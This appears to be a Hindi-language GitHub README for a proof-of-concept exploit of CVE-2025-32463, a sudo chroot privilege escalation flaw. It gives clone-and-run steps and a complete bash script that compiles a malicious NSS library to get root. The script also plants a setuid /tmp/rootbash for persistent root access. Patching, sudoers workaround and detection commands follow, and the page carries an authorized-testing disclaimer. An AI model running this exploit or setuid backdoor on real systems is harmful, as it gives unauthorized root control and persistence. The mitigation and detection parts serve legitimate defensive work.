
CVE-2025-32463 के लिए स्थानीय विशेषाधिकार वृद्धि शोषण, sudo chroot डिज़ाइन दोष को लक्षित करता है। प्रभावित sudo संस्करणों 1.9.14-1.9.17 के लिए PoC स्क्रिप्ट, तकनीकी विश्लेषण और शमन मार्गदर्शन प्रदान करता है।
CVE-2025-32463 सुडो संस्करण 1.9.14 से 1.9.17 में एक गंभीर स्थानीय विशेषाधिकार वृद्धि भेद्यता है। यह भेद्यता सुडो विशेषाधिकार वाले हमलावरों को chroot विकल्प प्रसंस्करण तर्क में एक डिज़ाइन दोष का शोषण करके रूट एक्सेस तक बढ़ने की अनुमति देती है।
भेद्यता सुडो की सुरक्षा सत्यापन प्रक्रिया में समय की समस्या के कारण उत्पन्न होती है। pivot_root फ़ंक्शन को सुरक्षा नीति सत्यापन से पहले निष्पादित किया जाता है, जिससे हमलावर फ़ाइल सिस्टम वातावरण में हेरफेर कर सकते हैं जिसका उपयोग सुडो प्रमाणीकरण और प्राधिकरण के लिए करता है।
nsswitch.conf के साथ एक नियंत्रित chroot वातावरण बनाता हैpivot_root: प्रक्रिया में बहुत जल्दी निष्पादित किया गयाset_cmnd_path: हेरफेर किए गए वातावरण में संचालित होता हैcommand_matches: वातावरण हेरफेर के कारण सुरक्षा जांच को दरकिनार कर दिया गयाइस शोषण का उपयोग करने से पहले, सुनिश्चित करें कि निम्नलिखित शर्तें पूरी हों:
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
chmod +x cve-2025-32463.sh
./cve-2025-32463.sh
जांचें कि लक्ष्य प्रणाली कमजोर है या नहीं:
# sudo संस्करण जांचें
sudo --version
# sudo विशेषाधिकार जांचें
sudo -l
# chroot-संबंधित अनुमतियाँ देखें
sudo -l | grep chroot
मुख्य शोषण स्क्रिप्ट (cve-2025-32463.sh):
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] CVE-2025-32463 का शोषण किया जा रहा है..."
echo "[*] विशेषाधिकार वृद्धि का प्रयास किया जा रहा है..."
sudo -R pentest pentest
# सफाई
rm -rf ${STAGE?}
सफल शोषण के बाद, रूट एक्सेस सत्यापित करें:
# वर्तमान विशेषाधिकार जांचें
whoami
# प्रूफ फ़ाइल जांचें
cat /tmp/pwned_proof.txt
# सतत रूट एक्सेस के लिए setuid bash का उपयोग करें
/tmp/rootbash -p
sudo को अपडेट करें संस्करण 1.9.17p1 या बाद के:
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
sudoers से chroot निर्देश हटाएं (अस्थायी समाधान):
# वर्तमान कॉन्फ़िगरेशन का बैकअप लें
sudo cp /etc/sudoers /etc/sudoers.backup
# chroot-संबंधित प्रविष्टियाँ हटाएं
sudo sed -i '/chroot/d' /etc/sudoers
# सिंटेक्स सत्यापित करें
sudo visudo -c
शोषण प्रयासों की निगरानी करें:
# संदिग्ध अस्थायी निर्देशिकाएँ जांचें
find /tmp -name "*.stage.*" -type d
# sudo लॉग की निगरानी करें
tail -f /var/log/auth.log | grep sudo
# NSS लाइब्रेरी संकलन देखें
find /tmp -name "libnss_*.so*" -type f
भेद्यता sudo के निष्पादन प्रवाह में एक डिज़ाइन दोष से उत्पन्न होती है:
सामान्य अपेक्षित प्रवाह:
वास्तविक कमजोर प्रवाह:
शोषण नेम सर्विस स्विच (NSS) सिस्टम का लाभ उठाता है:
/etc/nsswitch.conf पढ़ता हैइस शोषण का परीक्षण निम्न पर किया गया है:
⚠️ महत्वपूर्ण अस्वीकरण ⚠️
यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
योगदान का स्वागत है! कृपया:
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
नोट: यह भेद्यता एक महत्वपूर्ण सिस्टम घटक को प्रभावित करती है। कृपया जिम्मेदारी से उपयोग करें और सुनिश्चित करें कि सभी परीक्षण अधिकृत हैं।